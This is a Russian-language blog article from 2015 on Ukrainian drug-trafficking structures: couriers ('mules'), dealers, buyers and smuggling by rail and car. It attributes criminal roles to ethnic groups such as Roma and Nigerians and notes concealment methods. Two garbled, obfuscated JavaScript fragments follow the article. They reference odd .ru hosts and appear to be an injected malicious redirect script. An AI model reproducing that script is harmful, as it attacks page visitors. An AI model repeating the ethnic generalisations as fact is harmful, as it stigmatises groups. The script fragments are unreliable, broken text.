ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

«МУЛЫ» В УКРАИНЕ. Как работает наркомафия

Posted by operkor на Ноябрь 16, 2015

1В Украине существует  несколько форм организованной преступности, связанной с наркобизнесом. Уместно их классифицировать по трёхчленной схеме. Низший уровень составляют ситуативные, простые группы, которые создаются, в том числе, и наркоманами для заработка, извлечения прибыли. Эти группы неустойчивы, не имеют жёсткой структуры и распределения ролей.

Средний уровень занимают организованные преступные группы. Характерным является существование семейных и этнических групп, специализирующихся на заготовке наркосырья, кустарном изготовлении наркотиков и их продаже потребителям.

Наиболее типичны — цыганские семьи, некоторые из которых занимаются наркодеятельностью в течение десятилетий. Цыганские кланы могут быть как этноареальные, так и иные — венгерские, крымские. Такие семьи при удачном преступном бизнесе быстро превращаются в расширенные группировки, целые синдикаты, где существует чёткая иерархия и распределение ролей: богатые (бароны) контролируют наркобизнес, средние поставляют наркотики, а бедные их реализуют. Как правило, указанные преступные формирования хорошо организованы, имеют высокую степень конспирации, основанную на семейно-клановых связях.

Высший уровень организованного наркобизнеса — это преступные организации, которые контролируются криминальными авторитетами и могут осуществлять свою деятельность в транснациональном масштабе. В регионе эта деятельность может быть обнаружена лишь частично, в связи с задержаниями наркокурьеров, изъятием крупных партий наркотиков.  Борьба с наркомафией может эффективно осуществляться лишь в международном масштабе.

Незаконный оборот наркотиков можно рассматривать с точки зрения определённой латентной социальной структуры, которая включает несколько социальных групп, статусов и ролей, а также системы социальных связей, норм и правил поведения. Некоторые статусы уже нашли своё отражение в уголовном законодательстве, которое оперирует такими терминами как «исполнитель преступления», «организатор преступления», «соучастие в преступлении» и «преступная группа».

Лицо, которое самостоятельно и непосредственно осуществляет запрещённые законом действия с наркотическими средствами, признается исполнителем преступления. Действия организатора преступления связаны с поиском членов преступной группы, определением объекта посягательств, разработкой плана осуществления преступления, необходимого для достижения преступной цели.

Другие понятия, относящиеся к социальной структуре, о которой идёт речь, не нашли отражение в уголовном законодательстве. Наркокурьер (на жаргоне — «муравей», «мул») — лицо, которое непосредственно перевозит наркогруз. Обычно это люди, представляющие малообеспеченные слои населения и остро нуждающиеся в деньгах. Здесь преобладают женщины со средним и средне-специальным образованием различной этнической принадлежности (украинки, русские, цыганки), возраст которых колеблется в очень большом диапазоне (от 20 до 70 лет), но обычным является — 40–45 лет.

Достаточно часто среди наркокурьеров встречаются безработные, бомжи, другие представители маргинальных слоёв общества. Как правило, эти люди не употребляют наркотические средства и рассматривают свою «транспортную» деятельность как заработок.

Особо следует сказать о наркокурьерах, деятельность которых связана с перевозкой тяжёлых наркотиков. Из стран дальнего зарубежья (азиатских и африканских) их доставляют лица мужского пола, часто используя для этого… собственный желудок. Известно, что в капсулу, диаметром в два сантиметра, помещается до двадцати граммов героина. Специально приготовленные наркокурьеры способны проглотить десятки подобных капсул.

Для перевозки тяжёлых наркотиков по территории стран СНГ представители африканского континента (нигерийцы, марокканцы) не брезгуют помощью русских и украинских проституток, используя их анатомические свойства. Они активно налаживают контакты с местным населением, женщинами для легализации и соучастия в их бизнесе.

2В этой структуре стабильное место занимают продавцы наркотиков. Тяжёлые наркотики, по мнению экспертов, продают мужчины в возрасте 18–35 лет, физически благополучные, крепкие люди, по национальности — нигерийцы, афганцы, таджики, туркмены, узбеки.

Также сбытом героина и кокаина занимаются мужчины и женщины цыганского, украинского и русского происхождения, возраст которых не превышает 30 лет. Эксперты отмечают увеличение количества русских семей, занимающихся продажей наркотических средств.

Среди продавцов других видов наркотиков встречаются мужчины и женщины различного возраста (от 20 до 45 лет) и национальности (русские, украинцы, цыгане), представляющие различные слои населения: рабочие предприятий, студенты, маргиналы, наркоманы со стажем (в том числе встречаются бывшие врачи, санитары), безработные и др.).

Например, марихуаной торгуют неработающие цыгане (возраст от 10 до 70 лет, в основном, лица женского пола, иногородние (крымские, днепропетровские, николаевские) студенты высших учебных заведений города Харькова.

Контингент покупателей психостимуляторов, каннабиоидов и барбитуратов оценивается экспертами как достаточно стабильный. Обычно, это мужчины и женщины в возрасте от 16 до 30 лет, также встречаются подростки 13–14 лет, различной национальности (русские, украинцы, азербайджанцы и др.). Социальные статусы этих людей самые разнообразные: подростки из интеллигентных и рабочих семей, студенты вузов, наркоманы, бывшие заключённые, бомжи, маргиналы и др.

Сегодня основным покупателем, а соответственно, и потребителем наркотических средств является подростковая и студенческая молодёжь. На протяжении последних нескольких лет, по оценкам экспертов, наметилась тенденция к употреблению молодёжью психостимуляторов: амфетаминов, эфедрина, первитина и пр.

Современная молодёжь, следуя веяниям моды, обращается к «безобидным», по её мнению, стимуляторам для достижения уверенности и эмоционального подъёма. С этой целью наиболее широко используются таблетки экстази, легко приобретаемые на дискотеках и в ночных клубах. После частого применения таких препаратов у молодёжи появляется необходимость перехода к более сильным типам наркотиков: каннабиоидам и барбитуратам.

Именно во время их употребления появляется привычка к изменённому состоянию сознания, а отсутствие наркотического воздействия воспринимается как дискомфорт. Возрастание дозы и частоты употребления заставляет молодёжь обращаться к опиатам, которые вызывают биологическую зависимость…

Главным средством доставки и транзита наркотиков является железнодорожный транспорт. И это не случайно, так как технически сложные системы дают дополнительный шанс для преступников. По данным экспертов, в вагоне пассажирского поезда существует 96 мест, где можно спрятать маковую соломку, в тепловозе «надёжным» тайником для перевозки являются специальные аккумуляторные батареи.

Известно, что в районах произрастания конопли ежегодно в летние месяцы регистрируются (данные статистики Министерства путей сообщений) нештатные остановки грузовых поездов путём замыкания электроцепей перед светофорами.

Для перевозки наркотических средств очень часто используется автомобильный транспорт.

По мнению экспертов, сбыт и торговля наркотиков всё в большей степени происходят по месту проживания торговцев и наркоманов, а также на снимаемых квартирах в государственных и частных домах.

Следует отметить, что существует вполне определённая зависимость между видом наркотика и местом его наиболее вероятного приобретения (например, героин и гашиш — на квартирах; конопля — в школах и вузах; таблетки экстази — в ночных клубах и на дискотеках. Естественно, что эта вероятность весьма условная.

Правовые средства борьбы с незаконным оборотом наркотиков играют важную роль только в тесном взаимодействии с иными мерами воздействия со стороны государства, социальных институтов общества, негосударственных организаций, всех заинтересованных лиц. Незаконный оборот наркотиков — проблема социальная, и решать её нужно сообща.

По материалам из открытых источников

Украинские ведомости

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//cs8gc1senu.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: